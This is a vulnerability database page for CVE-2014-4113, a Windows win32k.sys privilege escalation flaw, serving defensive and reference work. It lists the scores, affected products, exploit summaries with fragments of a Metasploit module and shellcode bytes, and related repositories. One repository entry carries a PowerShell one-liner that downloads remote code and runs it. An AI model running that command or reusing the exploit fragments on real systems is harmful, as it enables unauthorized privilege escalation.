Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.2
CVSSv2

CVE-2014-4113

Published: 15/10/2014 Updated: 26/02/2019
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 744
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Microsoft

Vulnerability Summary

win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows 7 -

microsoft windows 8.1 -

microsoft windows server 2003

microsoft windows vista

microsoft windows server 2012 r2

microsoft windows rt 8.1 -

microsoft windows 8 -

microsoft windows server 2012 -

microsoft windows server 2008

microsoft windows server 2008 r2

microsoft windows rt -

Exploits

Exploit DB: Windows 8.0 / 8.1 x64 TrackPopupMenu Privilege Escalation
Microsoft Windows versions 80 and 81 on x64 TrackPopupMenu privilege escalation exploit that leverages the vulnerability documented in MS14-058 ...
Exploit DB: Windows TrackPopupMenu Win32k NULL Pointer Dereference
This Metasploit module exploits a NULL Pointer Dereference in win32ksys, the vulnerability can be triggered through the use of TrackPopupMenu Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution This Metasploit module has been tested successfully on Windows XP SP3, Wind ...
Exploit DB: Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference (MS14-058) (Metasploit)
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows ...
Exploit DB: Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)
#include "hdh" // EDB Note ~ Download: githubcom/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46945rar byte __s_code[]={ 0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 , 0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 , ...
Exploit DB: Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)
# Windows 80 - 81 x64 TrackPopupMenu Privilege Escalation (MS14-058) # CVE-2014-4113 Privilege Escalation # wwwoffensive-securitycom # Thx to Moritz Jodeit for the beautiful writeup # wwwexploit-dbcom/docs/35152pdf # Target OS Windows 80 - 81 x64 # Author: Matteo Memelli ryujin <at> offensive-securitycom # EDB Note: ...
Exploit DB: Microsoft Windows Kernel - 'win32k.sys' Local Privilege Escalation (MS14-058)
Sources: labsmwrinfosecuritycom/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113pdf githubcom/sam-b/CVE-2014-4113 EDB Mirror: wwwexploit-dbcom/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113pdf Trigger and exploit code for CVE-2014-4113: githubcom/offensive-security/exploitdb ...

Github Repositories

https://github.com/sathwikch/windows-exploitation

Awesome Windows Exploitation A curated list of awesome Windows Exploitation resources, and shiny things There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows Kernel Memory Corruption Re

https://github.com/MRNIKO1/Cobalt-Strike-Cheat-Sheet

Cobalt-Strike-Cheat-Sheet Cobalt Strike Cobalt Strike is threat emulation software Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful grap

https://github.com/clxsh/WindowsSecurityLearning

CVE CVE-2014-4113 MS16-098 HEVD Stack Overflow Win7 SP1 x64 Win10 1709 x64 ArbitraryOverwrite Win7 SP1 x64 Win81 x64 Win10 1703 x64 Integer Overflow NULL Pointer Dereference Win7 SP1 x64 (x) Win7 SP1 x86 Uninitialized Memory Stack Win7 SP1 x64 Non-Paged Pool Overflow Win7 SP1 x86 Windows 内核实验 simple notes Programming simple cmd reverse shell keyl

https://github.com/sailay1996/awe-win-expx

noted

Windows stack overflows Stack Base Overflow Articles + Win32 Buffer Overflows (Location, Exploitation and Prevention) - by Dark spyrit [1999] + Writing Stack Based Overflows on Windows - by Nish Bhalla’s [2005] + Stack Smashing as of Today - by Hagen Fritsch [2009] + SMASHING C++ VPTRS - by rix [2000] ## Windows heap overflows Heap Base Overflow Articles + Third Generat

https://github.com/patois/winmagic_sd

Technical Write-Up on and PoC Exploit for CVE-2020-11519 and CVE-2020-11520

Technical Write-up on CVE-2020-11519 and CVE-2020-11520 Date: June 2020 Author: Dennis Elser (code: github) Table of Contents Introduction Approach and Technical Description CVE-2020-11519 CVE-2020-11520 Proof-of-Concept Exploit Disclosure Timeline Solution Checksums References Introduction In reference to its web representation, Winmagic SecureDoc "allows businesses

https://github.com/sathwikch/awesome-windows-exploitation

Awesome Windows Exploitation A curated list of awesome Windows Exploitation resources, and shiny things There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Table of Contents Windows stack overflows Windows heap overflows Kernel based Windows overflows Windows Kernel Memory Corruption Re

https://github.com/h3ll0clar1c3/CRTO

Certified Red Team Operator

CRTO Certified Red Team Operator Course Introduction Command & Control External Reconnaissance Initial Compromise Host Reconnaissance Host Persistence Host Privilege Escalation Domain Reconnaissance Lateral Movement Credentials & User Impersonation Password Cracking Tips & Tricks Session Passing Pivoting Data Protection API Kerberos Active Directory Cer

https://github.com/MRNIKO1/Cobalt-Strick-Cheat-Sheet

Cobalt-Strike-Cheat-Sheet Cobalt Strike Cobalt Strike is threat emulation software Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful grap

https://github.com/manas3c/CRTO-Notes

CRTO Certified Red Team Operator Course Introduction Command & Control External Reconnaissance Initial Compromise Host Reconnaissance Host Persistence Host Privilege Escalation Domain Reconnaissance Lateral Movement Credentials & User Impersonation Password Cracking Tips & Tricks Session Passing Pivoting Data Protection API Kerberos Active Directory Cer

https://github.com/timip/OSEE

OSEE Preparation

AWE/OSEE Preparation Blog addaxsoftcom/blog/offensive-security-advanced-windows-exploitation-awe-osee-review/ infosecflashcom/2018/11/04/my-awe-experience/ trickster0wordpresscom/2018/10/27/awe-course-review-by-offensive-security/ wwwjscybersecio/blogpage/Offensive-Security-Exploitation-Expert-OSEE Public Reference Materials by Module Modu

https://github.com/johnjohnsp1/CVE-2014-4113

PowerShell CVE-2014-4113

CVE-2014-4113 PowerShell CVE-2014-4113 x64 Windows Only iex (New-Object NetWebClient)DownloadString('bitly/1qosbJH')

https://github.com/sam-b/CVE-2014-4113

Trigger and exploit code for CVE-2014-4113

CVE-2014-4113 Trigger and exploit code for CVE-2014-4113

https://github.com/nsxz/Exploit-CVE-2014-4113

Exploit CVE-2014-4113

Exploit-CVE-2014-4113 CVE-2014-4113 is a Local & Privilege Escalation Exploits You can get the SYSTEM Privilege support platform: x86; windows xp and windowx 7 usage: 打开cmdexe,切换到当前程序所在目录,执行如下命令: cve-2014-4113exe [target program name] for example: cve-2014-4113exe calcexe

Recent Articles

Zero-day hacking group resorts to UNICORN SMUT-SLINGING
The Register • Darren Pauli • 26 Nov 2014

Playboy ploy not beneath APT3

Sysadmins who have not yet patched their Windows boxes against the 18-year-old "unicorn-like" OLE bug disclosed last month could expect a deluge of spear phishing smut from a group once confined to lofty targeted zero-day attacks. The talented APT3 group was behind widespread zero-day attacks code-named Clandestine Fox earlier this year and was now targeting recently patched Windows vulnerabilities, according to FireEye researchers. That group had begun spewing spear-phishing emails targeting tw...

Read more...
Microsoft Security Updates October 2014
Securelist • Kurt Baumgartner • 14 Oct 2014

Update (2014.10.15) – administrative notes for preparation… Friends on Twitter let me know their update cycle took close to 20 minutes on Windows 7. Yesterday, others on 8.1 told me their update download was around a gig, for some it was ~200 mb. Also, this cycle likely requires everyone a reboot to complete. ******* This morning was possibly one of the most information rich in the history of Microsoft’s patch Tuesdays. Last month, we pointed out the Aurora Panda/DeputyDog actor was l...

Read more...

References

CWE-264http://blogs.technet.com/b/srd/archive/2014/10/14/accessing-risk-for-the-october-2014-security-updates.aspxhttp://secunia.com/advisories/60970http://www.securityfocus.com/bid/70364http://osvdb.org/show/osvdb/113167http://www.exploit-db.com/exploits/35101http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/https://www.exploit-db.com/exploits/37064/http://packetstormsecurity.com/files/131964/Windows-8.0-8.1-x64-TrackPopupMenu-Privilege-Escalation.htmlhttps://github.com/sam-b/CVE-2014-4113https://www.exploit-db.com/exploits/39666/https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-058https://nvd.nist.govhttps://www.theregister.co.uk/2014/11/26/zeroday_group_degenerates_into_unicorn_smut_slinging/https://www.exploit-db.com/exploits/35101/https://github.com/sailay1996/awe-win-expx
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2023-21987buffer overflowCVE-2024-28890CVE-2024-27574CVE-2024-27347CVE-2024-31450privilegeSSTICVE-2024-31666
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook